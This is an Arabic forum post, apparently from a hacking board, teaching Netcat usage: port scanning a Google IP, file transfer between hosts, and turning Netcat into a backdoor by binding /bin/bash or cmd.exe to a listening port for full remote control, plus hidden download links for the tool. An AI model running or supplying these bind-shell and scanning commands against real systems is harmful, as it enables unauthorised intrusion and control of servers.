Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools
استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها
فحص المنافذ المفتوحة في السيرفر
تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر
كود:
nc -v -w1 SERVER-IP -z FromPort-ToPort
أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
كود:
nc -v -w1 64.233.183.147 -z 1-100
ولفحص أكثر من نطاق منافذ نستعمل الأمر
كود:
nc -v -w1 -z 64.233.183.147 -z 1-100 400-500
ملاحظة: 64.233.183.147 هو IP موقع Google
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
كود:
nc SERVER-IP PORT < FILE
ونطبق الأمر في الجهاز المستقبل
كود:
nc -l -p PORT > FILE
مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
كود:
nc 192.168.0.45 5555 < data.txt
أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
كود:
nc -l -p 5555 > data.txt
جعل الـ Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر
كود:
nc -l -p PORT -e PROGRAM
مع اضافة -d و -L في ويندوز ليصبح الأمر
كود:
nc -l -p PORT -d -e PROGRAM -L
مثال على هذه الخاصية نقوم بتطبيق الأمر
كود:
nc -l -p 4455 -e /bin/bash
على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
كود:
nc -l -p 4455 -e -d cmd.exe -L
وللاتصال بالسيرفر نطبق الأمر
كود:
nc -v -n SERVER-IP 4455
وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
تحميل الأداة لنظام التشغيل لينكس
[hide]http://netcat.sourceforge.net/download.php[/hide]
تحميل الأداة لنظام التشغيل ويندوز
[hide]http://www.multiupload.com/0T8L2MGOQD[/hide]
باسوورد فك الضغط
نسأل الله أن نكون قد وفقنا في الشرح ، ونأسف على أي تقصير
ودمتم سالمين